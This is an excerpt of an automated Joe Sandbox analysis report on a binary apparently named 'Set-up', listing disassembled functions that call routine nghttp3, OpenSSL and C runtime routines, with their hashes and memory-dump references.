                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID:
                          • API String ID: 3510742995-0
                          • Opcode ID: c35dbf2a370d4536a694edc1e4ea6f1ce2ecdae95a8ccca9c45a894313f88fb9
                          • Instruction ID: 99dc29124c4cc06ba91793a532ae41b9ea9f47299e6ecf940f5b33b540b64a92
                          • Opcode Fuzzy Hash: c35dbf2a370d4536a694edc1e4ea6f1ce2ecdae95a8ccca9c45a894313f88fb9
                          • Instruction Fuzzy Hash: B5C18C716043109FCB04DF2CC888A6A7BE5FF88314F59856AF9498B396D771EC50CBA6
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < len || offset == 0,nghttp3_stream.c,00000371,00000000,00ADD7A7,?,?,00ADD7A7), ref: 00B061CF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: i < len || offset == 0$nghttp3_stream.c
                          • API String ID: 1222420520-1528673747
                          • Opcode ID: 002336c15970d5ffa4a837f6bce14f7ec65dbb4843e909c86afb79cc1b763c3d
                          • Instruction ID: 961878a7fa10bad4cd3eb9f597f7ce43fe59f8f5cac2f82e0e5c35a7dbc51725
                          • Opcode Fuzzy Hash: 002336c15970d5ffa4a837f6bce14f7ec65dbb4843e909c86afb79cc1b763c3d
                          • Instruction Fuzzy Hash: 831182755043048FD304EF29D898FA677E5FF88320F0904BDE98957393DA31A955CB92
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((blklen & 0xfu) == 0,nghttp3_balloc.c,00000022,00B088D3,00000010,?,?,00000000,00B09AE3,00B0ACDD,-00000010,?,?,?,00000000,?), ref: 00B0873C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: (blklen & 0xfu) == 0$nghttp3_balloc.c
                          • API String ID: 1222420520-1502420682
                          • Opcode ID: 0bd8aaa24d4ef934fb135f0df7a6bc057e53e73d2d2291c80a2a066494762158
                          • Instruction ID: 12445607198f11c0e18b19467dfeb32f5f4a48055fd2f2e807e8ae9588c41485
                          • Opcode Fuzzy Hash: 0bd8aaa24d4ef934fb135f0df7a6bc057e53e73d2d2291c80a2a066494762158
                          • Instruction Fuzzy Hash: 1C11A175649740AFD3229B14EC01B56BFB1EF42B04F1984D9E8889B2D7EA30DD04D792
                          APIs
                          • _byteswap_uint64.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFF3F,?,nghttp3_conv.c,0000003D,nghttp3_get_varint,00B05084,?,?), ref: 00B08A31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _byteswap_uint64
                          • String ID: nghttp3_conv.c$nghttp3_get_varint
                          • API String ID: 1624361598-912089391
                          • Opcode ID: 2e907d9f9f9364343410567519ff1c881af4b268c7964163ac308b73c8039029
                          • Instruction ID: 70d42e27f922ad0755d066a80670bfe4c70f2229d1ad996226aece2af24a32a4
                          • Opcode Fuzzy Hash: 2e907d9f9f9364343410567519ff1c881af4b268c7964163ac308b73c8039029
                          • Instruction Fuzzy Hash: 61F02BB15001425BE708AF39D841538BBD1EB82312F4882E1F098CE4D4DB78C981FB11
                          APIs
                          • strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,\/@), ref: 00A8C1E5
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A8C1F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlenstrpbrk
                          • String ID: \/@
                          • API String ID: 3089284949-4263999291
                          • Opcode ID: 3e5daef3a7cbe7dbce075e4ed0ff6b245b471ec573ad17682daa07a23c6b5f37
                          • Instruction ID: 36d6c164289312e54b86626b9bdc219dd7884d0f8baa5c149aa623378f985a71
                          • Opcode Fuzzy Hash: 3e5daef3a7cbe7dbce075e4ed0ff6b245b471ec573ad17682daa07a23c6b5f37
                          • Instruction Fuzzy Hash: 51E086D3E0415035DA2131BCFC41AEE535486E1A71F1D0267E458D2244F530894153B2
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp3_rcbuf.c,0000005E,00B10B2D,5308C483,00000000,00B04D9F,?,00B00EC8), ref: 00B00333
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: nghttp3_rcbuf.c$rcbuf->ref > 0
                          • API String ID: 1222420520-1879435254
                          • Opcode ID: bc086e9f6c197ded5a045b3c08ef68d56424f6fd16e1e126dbb039f34be4489a
                          • Instruction ID: 65ecad6b3a7a1be639195d0414104c21ea0a290bddcc9890ba6e34687c6c54d3
                          • Opcode Fuzzy Hash: bc086e9f6c197ded5a045b3c08ef68d56424f6fd16e1e126dbb039f34be4489a
                          • Instruction Fuzzy Hash: A8E030382106049FCA19AB14D955B65BBE1FF88722F98C1DCF4088B2E1DB71DC02DE05
                          APIs
                            • Part of subcall function 00C39F60: GetStdHandle.KERNEL32(000000F4), ref: 00C39F76
                            • Part of subcall function 00C39F60: GetFileType.KERNEL32(00000000), ref: 00C39F83
                            • Part of subcall function 00C39F60: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 00C39FBB
                          • raise.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000016,00C3D8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,00C3DF70,?,?,?,?,?,?,?,00000000), ref: 00C3A18B
                          • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000003,?,00C3D8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,00C3DF70,?,?,?,?,?,?,?), ref: 00C3A195
                          Strings
                          • %s:%d: OpenSSL internal error: %s, xrefs: 00C3A17C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: File$HandleTypeWrite_exitraise
                          • String ID: %s:%d: OpenSSL internal error: %s
                          • API String ID: 2477291680-569889646
                          • Opcode ID: c867854fa78e7d72384c56d266fde103e31567b170d9b1ba5a4d10679e30f870
                          • Instruction ID: dc01f0316db7cd959a249cbd8d4113e821460cc73202f140167c0bfb35f975ae
                          • Opcode Fuzzy Hash: c867854fa78e7d72384c56d266fde103e31567b170d9b1ba5a4d10679e30f870
                          • Instruction Fuzzy Hash: 7CC01272944385AFEB02BFD15C03A6AB565EF65700F081C1CB299240D29BB39534B737
                          APIs
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,000000FF,00000000,00000000), ref: 00AA48DC
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00AA48EB
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00AA4905
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00AA4914
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$freemalloc
                          • String ID:
                          • API String ID: 2605342592-0
                          • Opcode ID: af2f4287603d6fac2bdab2cfb24616b36bc301c57cde4d869c810d3ac3d8311c
                          • Instruction ID: e3143091e3004112f2c95af29abd27d5a3b8b439d7648d0f749ec81409bac305
                          • Opcode Fuzzy Hash: af2f4287603d6fac2bdab2cfb24616b36bc301c57cde4d869c810d3ac3d8311c
                          • Instruction Fuzzy Hash: 10F0B47274421576F63032BA6C02F37364CDB96BB4F180234B914EB2C5EAD1DD104271
                          APIs
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00A6F9BB,00000000,00A75F07,?,?,00A6F9BB,?), ref: 00DE4266
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00A6F9BB,00000000,00A75F07,?,?,00A6F9BB,?), ref: 00DE427A
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00A6F9BB,00000000,00A75F07,?,?,00A6F9BB,?), ref: 00DE4285
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00A6F9BB,00000000,00A75F07,?,?,00A6F9BB,?), ref: 00DE4290
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: dbf9aff5ee0786e0516a8789c7a0a5d6dedbc19d442b50162b924f2adf8c788f
                          • Instruction ID: 9a3aa572d56f9a789eeb2a2f88548fe8278aa0acf75f125e674bcd3d691d9ea4
                          • Opcode Fuzzy Hash: dbf9aff5ee0786e0516a8789c7a0a5d6dedbc19d442b50162b924f2adf8c788f
                          • Instruction Fuzzy Hash: BD018676A001508FEA60BF5AE845D1BB7D5EF90764F0D8479E5498B2A2D730EC409BB1
                          APIs
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00DBD8A5,?), ref: 00DD281B
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00DD2826
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00DD2831
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00DD283A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 8126f2f83da0042efe373529c6a6ddbb5a68456864cd6a4970c3e37437b27748
                          • Instruction ID: 6d6dc32c303371e036aae6cb1f953ee36b6d20f3134fbc09a5f7952c3cb0d645
                          • Opcode Fuzzy Hash: 8126f2f83da0042efe373529c6a6ddbb5a68456864cd6a4970c3e37437b27748
                          • Instruction Fuzzy Hash: E6D012B6C055545FF5123A11BC0244B76959E70338F080A34F84D212A6EA12AD2565F3